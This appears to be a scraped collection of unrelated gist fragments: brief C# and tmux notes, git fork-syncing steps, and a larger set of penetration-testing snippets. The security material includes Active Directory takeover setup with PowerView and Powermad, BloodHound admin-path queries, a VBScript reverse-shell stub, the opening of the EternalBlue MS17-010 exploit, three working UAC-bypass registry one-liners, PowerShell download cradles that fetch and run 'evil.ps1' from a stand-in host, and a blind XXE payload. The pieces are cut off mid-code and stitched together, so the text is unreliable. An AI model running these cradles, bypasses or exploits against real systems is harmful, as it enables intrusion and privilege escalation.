Justin Bollinger bandrel

C# For Python Programmers

Single-line comments are started with //. Multi-line comments are started with /* and ended with */.
C# uses braces ({ and }) instead of indentation to organize code into blocks. If a block is a single line, the braces can be omitted. For example,

start new:

tmux

start new with session name:

tmux new -s myname

	# import the necessary toolsets
	Import-Module .\powermad.ps1
	Import-Module .\powerview.ps1

	# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
	whoami

	# the target computer object we're taking over
	$TargetComputer = "primary.testlab.local"

	MATCH (u:User)-[r:AdminTo\|MemberOf*1..]->(c:Computer
	RETURN u.name

	That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
	---------------

	MATCH
	(U:User)-[r:MemberOf\|:AdminTo*1..]->(C:Computer)
	WITH
	U.name as n,

	Call X()
	End Function

	Dim RHOST: RHOST = "x.x.x.x"
	Dim RPORT: RPORT = "8999"

	Function Base64ToStream(b)
	Dim enc, length, ba, transform, ms
	Set enc = CreateObject("System.Text.ASCIIEncoding")
	length = enc.GetByteCount_2(b)

	#!/usr/bin/python
	# This file has no update anymore. Please see https://github.com/worawit/MS17-010
	from impacket import smb, ntlm
	from struct import pack
	import sys
	import socket

	'''
	EternalBlue exploit for Windows 8 and 2012 by sleepya
	The exploit might FAIL and CRASH a target system (depended on what is overwritten)

	UAC bypass for Win10:
	reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f

	UAC bypass for Win10:
	reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f

	UAC bypass for 7/8/10:
	reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f

	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>

	# kudos to https://github.com/drewlesueur
	# stolen from here: https://github.com/blog/266-fast-forward-your-fork#comment-11535
	git checkout -b upstream-master
	git remote add upstream git://github.com/documentcloud/underscore.git
	git pull upstream master
	git checkout master // [my master branch]
	git merge upstream-master
	git push origin master